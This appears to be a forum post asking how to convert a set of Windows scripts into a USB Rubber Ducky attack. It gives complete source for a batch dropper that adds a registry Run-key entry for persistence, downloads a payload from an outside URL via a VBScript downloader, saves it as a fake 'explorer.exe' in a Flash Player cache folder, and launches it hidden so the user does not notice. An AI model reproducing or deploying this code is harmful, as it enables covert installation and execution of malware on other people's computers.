Jump to content

.vbs/.bat files with rubber ducky


Recommended Posts

I want to create somehting to want 3 files detailed below on rubberducky:
..bat - Main script
wget.vbs - VBScript download "payload"
system.vbs - VBScript start .bat file in stealth way.
..bat - What it do?
1. Its adding new value to "system" registry "HKCU\software\microsoft\windows\currentversion\run", so it can start every time with restart of the system.
2. Script also checking if we have "payload" (named explorer.exe) here: "%appdata%\Adobe\Flash Player\NativeCache" | If it will find right file, its going to run it.
wget.vbs - If script will not find file, its going to download it via wget.vbs and then will run it.
system.vbs - Is also added to autostart, so we can activate script without user notice.
Any ideas how i can make it work/convert to rubber ducky?
Here you can see source files of these scripts;
..bat
@echo off
%windir%\system32\reg.exe add HKCU\software\microsoft\windows\currentversion\run /v System /d "wscript \"%appdata%\Adobe\Flash Player\NativeCache\system.vbs\" \"%appdata%\Adobe\Flash Player\NativeCache\..bat\"" /f
IF EXIST "%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe" (
start /b /normal "a" "%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe"
)
IF NOT EXIST "%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe" (
wscript.exe "%appdata%\Adobe\Flash Player\NativeCache\wget.vbs" http://www.meon.nl/sajsy/dokunty.ex"%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe"
start /b /normal "a" "%appdata%\Adobe\Flash Player\NativeCache\system explorer.exe"
)
system.vbs
CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
wget.vbs
'wget.vbs - similar to wget but written in vbscript
'based on a script by Chrissy LeMaire
' Usage
if WScript.Arguments.Count < 1 then
MsgBox "Usage: wget.vbs <url> (file)"
WScript.Quit
end if
' Arguments
URL = WScript.Arguments(0)
if WScript.Arguments.Count > 1 then
saveTo = WScript.Arguments(1)
else
parts = split(url,"/")
saveTo = parts(ubound(parts))
end if
' Fetch the file
Set objXMLHTTP = CreateObject("MSXML2.ServerXMLHTTP")
objXMLHTTP.open "GET", URL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0 'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(saveTo) Then objFSO.DeleteFile saveTo
Set objFSO = Nothing
objADOStream.SaveToFile saveTo
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
' Done
WScript.Quit
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...